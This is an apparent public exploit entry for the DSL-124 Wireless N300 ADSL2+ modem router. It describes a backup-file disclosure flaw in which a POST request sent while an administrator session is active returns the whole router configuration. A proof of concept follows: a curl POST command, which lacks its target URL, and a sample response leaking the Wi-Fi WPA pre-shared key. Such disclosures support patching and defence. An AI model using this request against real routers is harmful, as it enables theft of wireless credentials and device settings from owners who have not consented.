# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure  
# Date: 2022-11-10  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage:  
# Software Link:  
# Firmware Version: ME_1.00  
# Tested on: Windows 11  
# [ Details - DSL-124 ]:  
#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,  
#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,  
#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,  
#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.  
# [ Description ]:  
#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,  
#and in response to sending this request, she receives a complete backup of the router settings,  
#In fact this happens because of the lack of management of users and sessions in the network.  
# [ POC ]:  
Request :  
curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST  
Response :  
HTTP/1.1 200 OK  
Connection: close  
Server: Virtual Web 0.9  
Content-Type: application/octet-stream;  
Content-Disposition: attachment;filename="config.img"  
Pragma: no-cache  
Cache-Control: no-cache  
<V N="WLAN_WPA_PSK" V="pass@12345"/>  
<V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>  
<V N="WLAN_ENABLE_1X" V="0x0"/>  
<V N="WLAN_RS_IP" V=""/>